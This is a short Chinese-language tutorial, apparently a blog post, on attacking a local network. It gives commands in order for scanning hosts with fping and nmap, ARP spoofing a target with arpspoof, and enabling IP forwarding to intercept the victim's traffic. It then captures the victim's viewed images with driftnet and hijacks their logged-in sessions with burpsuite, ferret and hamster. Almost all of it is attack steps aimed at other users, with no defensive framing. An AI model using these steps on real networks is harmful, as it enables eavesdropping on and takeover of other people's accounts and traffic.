局域网断网攻击
fping -asg 192.168.1.0/24 ##扫描0网段所有能ping通的ip
nmap -Ss 192.168.1.141 ##扫描141主机打开的端口
arp攻击
arpspoof -i 自己的网卡 -t 目标IP 目标网关
例如:arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
局域网arp欺骗
目标的IP流量经过我的网卡,从网关出去
首先,进行IP流量转发
echo 1 >/proc/sys/net/ipv4/ip_forward (echo写命令,是不会有回显的)
再进行arpspoof命令
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
此时目标的流量将会经过我的网卡,就成为了arp欺骗
driftnet ##获取本机网卡的图片
因为目标的流量此时经过我的网卡,所以我获取本机网卡图片=获得目标所浏览图片
会话劫持——登陆别人登录过的网站
所用软件:
burpsuite ##抓包改包重放
首先对目标进行arp欺骗,然后用burpsuite进行抓包
当目标登陆了某些网站时,burpsuite上会显示很多DNS的信息
此时停止抓包,将文件保存为pcap格式,关闭burpsuite,
进入保存文件的目录,使用ferret -r 文件名 命令,生成一个.txt的文件;
此时执行hamster命令,会生成一些信息(127.0.0.1:1234)
意思是把代理改为127.0.0.1的1234端口
然后在浏览器输入127.0.0.1:1234即可看到一个ip,点击后进入,有很多地址,在其中找到我们需要的即可
ARP局域网断网攻击
最新推荐文章于 2024-07-01 11:00:53 发布